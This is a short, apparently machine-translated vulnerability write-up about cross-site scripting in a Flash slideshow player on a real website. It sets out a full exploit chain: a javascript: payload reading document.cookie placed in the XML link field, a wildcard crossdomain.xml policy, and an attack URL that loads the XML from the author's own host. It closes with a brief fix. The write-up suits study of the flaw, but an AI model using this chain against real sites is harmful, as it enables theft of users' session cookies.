GetURL security issues.
Case: lh.9you.com/web_v3/bcastr.swf? Bcastr_xml_url = xml/bcastr. xml refers to the call method. The external configuration or data file Suffix of the call, such as: xml and other Flash actionscript scripts. Currently, there are two versions on the network, namely, the content of functions 2.0 and 3.0 A is as follows: // as3.0 navigateToURL (new URLRequest (parameter), "_ self"); // as2.0 getURL (parameter, "_ self"); the case is 2.0. the parameter is the opened link. If the parameter is "javascript: alert (1)", you can execute javascript code. The effect of clicking to execute code here is similar to <a href = "javascript: alert (1) "> click I bring up 1 </a>. Let's take a look at the information in the xml configuration file: item_url is the displayed image Address link, and click the image jump parameter; this is the controllable parameter mentioned above. look at this swf in reverse order: getURL (bcastr_link_array [this. id], "_ blank"); find similar code. We can see from the variable name that bcastr_link_array is the array of link tags, and trace bcastr_link_array. bcastr_link_array = new Array ();............................. while (I <item_total_num) {bcastr_flie_array.push (bcastr_xml.firstChild.childNodes [I]. attributes. item_url); bcastr_title_array.push (bcastr_xml.firstChild.childNodes [I]. attributes. itemtitle); bcastr_link_array.push (bcastr_xml.firstChild.childNodes [I]. attributes. link); ++ I;} proves our conjecture that array loops are assigned values.
Vulnerability exploitation: converts link tag addresses to our attack code, such as javascript: alert (document. cookie); Cross-origin operation. place a crossdomain under the root directory of our website. xml <? Xml version = "1.0"?> <Cross-domain-policy> <allow-access-from domain = ""/> </cross-domain-policy> in this example, the website-> is changed: * .9you.com (match any 9you.com sub-domain name) last attack connection: http://lh.9you.com/web_v3/bcastr.swf? Bcastr_xml_url = http: // 127.0.0.1: 8080/bcastr. xml http: // 127.0.0.1: 8080/bcastr. xml is the environment I have set up. Click the image in it.
Solution:
Perform regular identification on the link url passed in XML or restrict loading of XML files from third-party websites. If you have checked these swf files, I will not refresh them.